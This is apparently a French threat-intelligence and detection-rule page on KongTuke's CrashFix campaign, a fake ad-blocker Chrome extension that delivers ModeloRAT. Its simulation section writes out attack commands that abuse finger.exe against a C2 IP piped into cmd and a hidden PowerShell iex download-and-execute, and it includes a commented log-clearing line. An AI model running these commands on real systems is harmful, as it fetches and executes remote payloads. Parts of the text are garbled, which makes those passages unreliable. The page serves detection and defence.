Disséquer CrashFix : Le Nouveau Jouet de KongTuke
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
KongTuke a distribué une extension Chrome malveillante, NexShield, imitant uBlock Origin Lite. Une fois installée, elle affiche un avertissement de sécurité « CrashFix » pour simuler un incident de sécurité légitime du navigateur, fait planter le navigateur et contraint l’utilisateur à exécuter une commande PowerShell malveillante copiée dans le presse-papiers. La campagne déploie un RAT Python, ModeloRAT, sur les systèmes joints à un domaine et une chaîne PowerShell à plusieurs étapes sur les hôtes autonomes.
Enquête
Les analystes de Huntress ont examiné le code de l’extension, lié le command-and-control à nexsnield.com et effectué une ingénierie inverse des charges utiles. Ils ont observé l’abus de finger.exe en tant que LOLBin pour récupérer les instructions de l’attaquant, ainsi qu’un DGA qui génère des domaines .top. Pour les environnements sur un domaine, les chercheurs ont identifié un implant Python chiffré en RC4 qui persiste via la clé HKCU Run. Le savoir-faire supplémentaire comprenait des contrôles anti-analyse, contournements de l’AMSI, et des tactiques d’épuisement des ressources destinées à pousser les utilisateurs à une conformité pleine et rapide.
Atténuation
Bloquez l’ID de l’extension Chrome et surveillez les extensions inconnues qui imitent des bloqueurs de publicité populaires. Détectez le beaconing vers nexsnield.com, les IP C2 et les domaines produits par le DGA. Appliquez le contrôle d’exécution pour limiter l’utilisation de LOLBin (y compris finger.exe) et alertez sur les valeurs de clé Run suspectes, en particulier les noms conçus pour ressembler à des logiciels largement utilisés.
Réponse
Alertez sur les installations d’extensions liées à NexShield et corrélez avec les connexions sortantes vers l’infrastructure C2 et DGA identifiée. Isolez les hôtes affectés et collectez les artefacts de l’extension, les clés de registre Run, les tâches programmées et les fichiers déposés. Supprimez la persistance de ModeloRAT, éradiquer les composants étagés de PowerShell, remédiez et validez le point d’extrémité.
Flux d’attaque
Détections
Appel de méthodes .NET suspectes à partir de Powershell (via powershell)
Voir
Utilisation suspecte de CURL (via cmdline)
Voir
Nom de fichier court (via cmdline)
Voir
Possibilité d’opération manuelle ou de script effectuée dans des dossiers inhabituels (via cmdline)
Voir
Chaînes PowerShell suspectes (via powershell)
Voir
Appel de fonctions de l’API Windows suspectes depuis Powershell (via powershell)
Voir
Points de persistance possibles [ASEPs – Hive Software/NTUSER] (via registry_event)
Voir
Un archive a été extraite dans un répertoire suspect à l’aide de PowerShell (via powershell)
Voir
Exécution de Python à partir de dossiers suspects (via cmdline)
Voir
Indicateurs possibles d’obfuscation de PowerShell (via powershell)
Voir
Possibilité d’énumération du système (via cmdline)
Voir
Téléchargement ou téléversement via PowerShell (via cmdline)
Voir
IOC (SourceIP) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke
Voir
IOC (HashSha256) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke
Voir
IOC (DestinationIP) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke
Voir
IOC (Emails) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke
Voir
Détecter l’exécution de commande malveillante CrashFix de KongTuke [Création de processus Windows]
Voir
Détection de contournement de l’AMSI et suppression des preuves via PowerShell [Windows PowerShell]
Voir
Exécution de simulation
Pré-requis : La vérification téléphonique & de référence doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narration de l’attaque & Commandes :
L’adversaire copie d’abord lafinger.exebinaire légitime dans le répertoire temporaire, le renomme enct.exe, et utilise ensuite une chaînecmd /cimbriquée pour invoquer le binaire copié avec un argument spécialement conçu qui contacte un serveur C2 distant (199.217.98.108). Le binaire streaming la charge utile vers la ligne de commande, qui est ensuite envoyée dans un secondcmdcmd /cpuis l'exécuté enutilisant PowerShell pour télécharger une charge utile secondaire viaiexet l’exécute immédiatement avec. Toutes les étapes sont effectuées avec une interface utilisateur minimale (. Toutes les étapes sont effectuées avec une interface utilisateur minimale () pour éviter la détection par utilisateur. -
1. Copier finger.exe → %TEMP%ct.exe 2. Exécuter : cmd /c start « » /min cmd /c « copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd » 3. Téléchargement & exécution de la charge utile secondaire via PowerShell : powershell -NoProfile -WindowStyle Hidden -Command « iex (Invoke-WebRequest -Uri ‘http://199.217.98.108/payload.ps1’ -UseBasicParsing).Content » Script de test de régression :
Le script ci-dessous reproduit la chaîne d'attaque complète sur une machine de test Windows. Exécutez-le dans une session PowerShell avec élévation. -
Nettoyer les commandes : Supprimez les artefacts et terminez tous les processus persistants créés par le test.
# Supprimer le ct.exe copié Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Tuez tous les processus cmd.exe ou powershell.exe résiduels lancés par le test (filtrez par ligne de commande spécifique) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Optionnel : effacez le journal des événements si nécessaire pour la répétition # wevlutil cl Security